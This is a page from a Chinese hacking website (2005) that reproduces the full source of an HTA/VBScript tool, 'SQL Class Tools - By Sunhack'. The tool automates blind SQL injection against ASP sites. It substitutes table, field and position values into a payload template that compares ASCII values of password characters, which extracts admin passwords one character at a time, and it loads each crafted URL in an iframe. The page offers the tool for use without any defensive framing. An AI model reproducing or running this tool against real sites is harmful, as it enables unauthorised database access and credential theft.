您现在的位置: 骇客基地 >> 黑客文章 >> 黑客攻防 >> 黑客编程 >> 正文

SQL注入网页形式版
骇客基地 阅读: 时间:2005-11-5 19:38:23 来源:www.hookbase.com
   <HEAD>
<TITLE> SQL Class Tools - By Sunhack</TITLE>
<HTA:APPLICATION ID="LiloHTA"
APPLICATIONNAME="Lilo"
BORDER ="dialog window"
BORDERSTYLE ="raised"
CAPTION ="yes"
ICON ="%windir%\Explorer.exe"
MAXIMIZEBUTTON ="no"
MINIMIZEBUTTON ="yes"
SHOWINTASKBAR ="YES"
INGLEINSTANCE ="no"
SYSMENU ="yes"
VERSION ="1.0"
WINDOWSTATE ="normal">
<style>body{font-size:9pt;border:0pt}input{font-size:9pt}
.textbox {BORDER-BOTTOM: #00378A 2px solid; BORDER-LEFT: 1px solid; BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid}
.vbutton {BORDER-BOTTOM: 1px solid; BORDER-LEFT: 1px solid; BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid ;
padding-top:2pt;padding-bottom:-1pt}
</style>
<Script Language="vbScript">
<!--
Sub Main
    Const HEIGHT = 840
    Const WIDTH = 650
    window.resizeTo HEIGHT, WIDTH
    window.moveTo (screen.width - HEIGHT) / 2, (screen.height - WIDTH) / 2
End Sub
Function GetStrThis()
    If inURL.Value ="" Or inSQL.Value="" Or inStr(inURL.Value ,"http://") = 0 Or inURL.Value = "http://" Then Exit Function
    GetStrThis= inSQL.Value
    GetStrThis= Replace(GetStrThis,"[B]",inBAS.Value)
    GetStrThis= Replace(GetStrThis,"[T]",inTAB.Value)
    GetStrThis= Replace(GetStrThis,"[F]",inFIL.Value)
    GetStrThis= Replace(GetStrThis,"[M]",inNUM.Value)
    GetStrThis= Replace(GetStrThis,"[N]",inCRM.Value)
    GetStrThis= Replace(inURL.Value & " " & GetStrThis & inEND.Value," "," ")
End Function
Function GoCreak_onClick()
    GoWhere.Location.Href="about:blank"
    GoWhere.document.write "<center><font style='font-size:9pt;color:RED'>Waitting For Open New URL...</font></center>"
    GoWhere.Location.Href=GetStrThis
End Function
Function SoCreak_onClick()
    Msgbox GetStrThis , 4096 ,"显示注入URL"
End Function
Function Show_onClick()
    Msgbox String(23," ") & Chr(inCRM.Value) & String(25," ") , 0 ,"ASCII To CHAR"
End Function
Function Document_onClick()
    'Window.Focus()
End Function
Function inENDStr()
    If inEND.Value="" Then inEND.Value=" and ''='" Else inEND.Value=""
End Function
Function Document_onKeyPress()
    If Window.Event.keyCode = 13 Then Call GoCreak_onClick()
End Function
Call Main
-->
</Script>
<Script Language="JavaScript">
function vSelect()
{ var GetThis = event.srcElement; return GetThis;}
</Script>
</HEAD>
<body scroll="no" style="margin-top:10pt">
<Center>
地址:<input type="text" name="inURL" size="95" value="http://www.my-china.net/xSQL/index.asp?id=1" Class="textbox"><BR><BR>
[B]:<input type="text" name="inBAS" size="7" value="" Class="textbox">
[T]:<input type="text" name="inTAB" size="7" value="admin" Class="textbox">
[F]:<input type="text" name="inFIL" size="7" value="id" Class="textbox">
[M]:<input type="text" name="inNUM" size="7" value="1" Class="textbox"> [N]:
<input type="text" name="inCRM" size="7" Value="33" Class="textbox">
<input type="button" value=" 显示ASCII " name="Show" Class="vbutton">
[W]:<input type="text" name="inEND" size="10" value="" Class="textbox"> [<font color="Red" onClick="vbScript:inENDStr" Style="Cursor:hand">*</font>]
<br><br>
<input type="text" Class="textbox" name="inSQL" size="92" value="and (select top 1 [F] from [T] where [F]=1 and asc(mid(password,[M],1))>[N])">
<input type="button" value=" 尝试 " name="GoCreak" Class="vbutton">
<input type="button" value=" 显示 " name="SoCreak" Class="vbutton">
<br><BR>
<iframe align=center name="GoWhere" frameborder="0" width=810 height=480 scrolling=auto src="about:blank"></iframe>
</center>
今天广告
参与评论:
注意事项:
【SQL注入网页形式版】文章由骇客基地网上搜集,其立场行为并不代表本站。
如果您发现该文章若无意中侵犯到您的权利,请联系我们!
未经本站明确许可,任何网站不得非法盗链及抄袭本站资源;如引用页面,请注明来自本站,谢谢您的支持!
最近更新
最新推荐
     
 
黑客首页 | 服务指南 | 软件发布  | 关于我们 | 本站声明  | 隐私声明 | 诚征英才 | 网站地图 | 友情链接 |
 
 
中国·黑客·骇客·基地 请使用IE6.0版本, 分辩率1024×768进行浏览 www.hookbase.com 站长:利客 Email:hookbase@163.com
Copyright © 2004-2009 All Rights Reserved. 粤ICP备05000985号